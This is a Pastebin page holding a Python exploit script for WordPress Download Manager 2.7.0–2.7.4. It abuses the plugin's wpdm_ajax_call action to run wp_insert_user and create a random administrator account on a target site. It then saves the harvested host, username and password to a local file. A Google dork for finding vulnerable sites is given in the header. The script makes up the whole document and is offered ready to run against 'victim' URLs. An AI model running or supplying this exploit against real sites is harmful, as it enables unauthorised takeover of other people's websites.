Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
- # Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
- # Exploit written by Claudio Viviani - http://www.homelab.it / Edited INURL - BRASIL
- # 2014-12-03: Discovered vulnerability
- # 2014-12-04: Patch released (2.7.5)
- # Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
- # Dork google: index of "wordpress-download"
- import urllib, urllib2, socket
- import sys
- import string, random
- import optparse
- import datetime
- import os
- # Check url
- def checkurl(url):
- if url[:8] != "https://" and url[:7] != "http://":
- print('[X] You must insert http:// or https:// procotol')
- sys.exit(1)
- else:
- return url
- # Check if file exists and has readable
- def checkfile(file):
- if not os.path.isfile(file) and not os.access(file, os.R_OK):
- now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
- print "0x" + str(now) + "[INFO][ERROR]: "+file+" file is missing or not readable"
- sys.exit(1)
- else:
- return file
- def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
- return ''.join(random.choice(chars) for _ in range(size))
- banner = """
- 0x[EXPLOIT NAME]: Wordpress Download Manager R3m0t3 C0d3 Ex3cut10n / INURL - BRASIL
- ------------------------------------------------------------------------------------------------------------------
- """
- commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
- commandList.add_option('-t', '--target', action="store",
- help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
- )
- commandList.add_option('--timeout', action="store", default=10, type="int",
- help="[Timeout Value] - Default 10",
- )
- options, remainder = commandList.parse_args()
- # Check args
- if not options.target:
- print(banner)
- commandList.print_help()
- sys.exit(1)
- host = checkurl(options.target)
- timeout = options.timeout
- print(banner)
- socket.setdefaulttimeout(timeout)
- username = id_generator()
- pwd = id_generator()
- body = urllib.urlencode({'action' : 'wpdm_ajax_call',
- 'execute' : 'wp_insert_user',
- 'user_login' : username,
- 'user_pass' : pwd,
- 'role' : 'administrator'})
- headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
- now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
- print "0x" + str(now) + "[INFO]: Tryng to connect to: "+host
- try:
- req = urllib2.Request(host+"/", body, headers)
- response = urllib2.urlopen(req)
- html = response.read()
- if html == "":
- now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
- print("0x" + str(now) + "[INFO][VALUE]: Account Added")
- now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
- print("0x" + str(now) + "[INFO][VALUE]: Location: "+host+"/wp-login.php")
- now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
- print("0x" + str(now) + "[INFO][VALUE]: Username: "+username)
- now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
- print("0x" + str(now) + "[INFO][VALUE]: Password: "+pwd)
- file_saved = 'Wordpress_Download_Manager_R3m0t3_C0d3_Ex3cut10n.txt'
- msg = '0x[INFO][FILE SAVED]: '+file_saved + "\n"
- url_saved = "HOST:: "+host+" USER:: "+username+"PWD:: "+pwd+"\n"
- if os.path.exists(file_saved):
- arquivo = open(file_saved, 'a')
- arquivo.write(url_saved)
- arquivo.close()
- print(msg)
- else:
- arquivo = open(file_saved, 'w')
- arquivo.write(url_saved)
- arquivo.close()
- print(msg)
- else:
- now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
- print("0x" + str(now) + "[INFO][FAIL]: Exploitation Failed :(")
- except urllib2.HTTPError as e:
- print("0x" + str(now) + "[INFO][ERROR]: "+str(e))
- except urllib2.URLError as e:
- print("0x" + str(now) + "[INFO][ERROR]: Connection Error: "+str(e))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement